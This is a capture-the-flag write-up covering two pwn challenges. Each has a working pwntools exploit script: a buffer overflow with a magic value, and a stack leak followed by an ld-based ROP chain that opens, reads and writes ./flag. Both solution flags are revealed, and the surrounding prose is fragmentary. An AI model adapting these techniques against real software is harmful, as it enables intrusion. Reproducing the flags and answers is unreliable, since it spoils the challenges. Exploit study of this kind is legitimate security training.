Write-ups:
-线
~ CuB3y0nd
# babystack

## Information

- Category: Pwn
- Points: 500

## Description

>  shell <br/>
> Get your own shell

## Write-up



## Exploit

```python
#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./babystack"
HOST = "pwn-10ba42cde6.challenge.xctf.org.cn"
PORT = 9999

# One call sets pwntools' log level, the target binary (pwntools derives
# arch/bits from it) and the terminal used when a debugger is attached.
context(log_level="debug", binary=FILE, terminal="kitty")

# The ELF object pwntools built when ``binary`` was assigned above.
elf = context.binary


def launch():
    """Open the target and bind it to the module-level ``target``.

    The pwntools command-line switch ``L`` selects a local process;
    otherwise a TLS-wrapped connection to ``HOST``:``PORT`` is used.
    """
    global target
    target = process(FILE) if args.L else remote(HOST, PORT, ssl=True)


def main():
    """Run the two-prompt interaction scripted in this write-up.

    The first prompt receives 24 filler bytes; the second receives 0xF8
    bytes of padding followed by the value 0x1337ABC, then the session is
    handed over to the user.
    """
    launch()

    first = b"A" * 24
    target.sendafter(b"flag1:", first)

    second = flat([b"B" * 0xF8, 0x1337ABC])
    # Pause so a debugger can be attached before the second send.
    raw_input("DEBUG")
    target.sendlineafter(b"flag2:", second)

    target.interactive()


if __name__ == "__main__":
    # Run only when executed directly, not when imported.
    main()
```

## Flag

:spoiler[`flag{W528uZdUsvWbiWxqon5YLvZa8x6uo8IP}`]

# stack

## Information

- Category: Pwn
- Points: 500

## Description

>  libc<br/>
> I don't need libc, and I guess you don't need it either

## Write-up

~~ description ld……~~

`printf` 使 rbp 

```asm showLineNumbers=false {26-27}
; Attributes: bp-based frame

; int sub_401354()
sub_401354 proc near

s= byte ptr -10h                ; 10h-byte local buffer; the saved rbp sits directly above it at [rbp+0]

; __unwind {
endbr64
push    rbp
mov     rbp, rsp
sub     rsp, 10h
lea     rax, [rbp+s]
mov     edx, 10h        ; n
mov     esi, 0          ; c
mov     rdi, rax        ; s
call    _memset                 ; zero-fills all 10h bytes of s
lea     rax, aCouldYouTellMe ; "Could you tell me your name?"
mov     rdi, rax        ; s
call    _puts
lea     rax, [rbp+s]
mov     edx, 18h        ; nbytes -- 18h > 10h: the read can run 8 bytes past s, over the saved rbp
mov     rsi, rax        ; buf
mov     edi, 0          ; fd
call    _read
lea     rax, [rbp+s]
mov     rsi, rax
lea     rax, format     ; "Hello, %s!\n"
mov     rdi, rax        ; format
mov     eax, 0
call    _printf                 ; %s on s: if all 10h bytes are non-zero there is no terminator inside s, so output continues into the saved rbp
nop
leave
retn
; } // starts at 401354
sub_401354 endp
```

## Exploit

```python
#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./pwn_patched"
HOST = "pwn-2229eb847f.challenge.xctf.org.cn"
PORT = 9999

# One call sets pwntools' log level, the target binary (pwntools derives
# arch/bits from it) and the terminal used when a debugger is attached.
context(log_level="debug", binary=FILE, terminal="kitty")

# The ELF object pwntools built when ``binary`` was assigned above.
elf = context.binary


def launch():
    """Open the target and bind it to the module-level ``target``.

    The pwntools command-line switch ``L`` selects a local process;
    otherwise a TLS-wrapped connection to ``HOST``:``PORT`` is used.
    """
    global target
    target = process(FILE) if args.L else remote(HOST, PORT, ssl=True)


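def main():
    """Drive the three-stage interaction scripted in this write-up.

    Stage 1 sends a 0x10-byte name and takes the 6 bytes echoed right
    after it as ``stack``; ``ld`` and ``ret`` are fixed offsets from it.
    Stage 2 answers "Any thing else?" with a 0x60-byte buffer fill, a
    saved-rbp value and the address 0x4013D4 (read), then sends a second
    frame ending in 0x40139B (printf) and takes the 6 bytes after
    "Hello, " minus 0x3B2E0 as ``leaked_ld``.  Stage 3 sends the
    ``./flag`` path, 0x60 bytes of padding and a chain of gadgets at
    fixed offsets from ``leaked_ld`` (openat, read into
    ``elf.bss() + 0x500``, write to fd 1), then hands the session over.

    Fix relative to the listing as published: the path literal read
    ``b"./flagx00x00"`` (12 bytes, escapes lost); it must be exactly
    8 bytes so that path + 0x60 padding equals the 0x68 bytes (0x60
    buffer + 8-byte saved rbp) the stage-2 layout establishes.
    """
    launch()

    # Stage 1: the 6 bytes printed directly after our 0x10-byte name.
    # raw_input("DEBUG")
    target.sendafter(b"name?", b"A" * 0x10)
    target.recvuntil(b"A" * 0x10)
    stack = int.from_bytes(target.recv(0x6), "little")
    ld = stack + 0xC0
    ret = stack + 0x20
    target.success(f"stack: {hex(stack)}")

    # Stage 2a: 0x60 bytes of buffer, the saved-rbp slot, then the return slot.
    payload = flat(
        b"A" * 0x60,
        ret + 0x60,
        0x4013D4,  # read
    )
    # raw_input("DEBUG")
    target.sendafter(b"Any thing else?", payload)

    # Stage 2b: frame consumed by the read above; ends in printf.
    payload = flat(
        0x401413,  # main
        b"A" * 0x58,
        ld + 0x10,
        0x40139B,  # printf
    )
    target.sendline(payload)
    target.recvuntil(b"Hello, ")
    leaked_ld = int.from_bytes(target.recv(0x6), "little") - 0x3B2E0
    target.success(f"libc: {hex(leaked_ld)}")

    target.sendlineafter(b"name?", b"")

    # Stage 3: gadget addresses are fixed offsets from the leak (values as on the page).
    pop_rdi = leaked_ld + 0x25E6B  # pop rdi; ret
    pop_rsi = leaked_ld + 0x54DA  # pop rsi; ret
    pop_rax_rdx_rbx = leaked_ld + 0x20322  # pop rax; pop rdx; pop rbx; ret
    syscall_ret = leaked_ld + 0x16629  # syscall; ret
    buf = elf.bss() + 0x500

    def frame(rdi, rsi, rax, rdx):
        """One register setup (rbx is always 0) followed by ``syscall; ret``."""
        return [pop_rdi, rdi, pop_rsi, rsi, pop_rax_rdx_rbx, rax, rdx, 0, syscall_ret]

    flag = stack - 0xA0
    chain = [
        *frame(-100, flag, 0x101, 0),  # openat
        *frame(0x3, buf, 0, 0x1337),  # read
        *frame(0x1, buf, 1, 0x1337),  # write
    ]
    payload = flat(
        # Exactly 8 bytes: the published listing showed b"./flagx00x00"
        # (12 bytes, escapes stripped), which shifts the chain by 4 bytes.
        b"./flag\x00\x00",
        b"A" * 0x60,
        *chain,
    )
    # Pause so a debugger can be attached before the final send.
    raw_input("DEBUG")
    target.sendafter(b"Any thing else?", payload)

    target.interactive()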


if __name__ == "__main__":
    # Run only when executed directly, not when imported.
    main()
```

## Flag

:spoiler[`flag{nfRlSH0ll0o4j4kd05IA6NJWtO8DYYSk}`]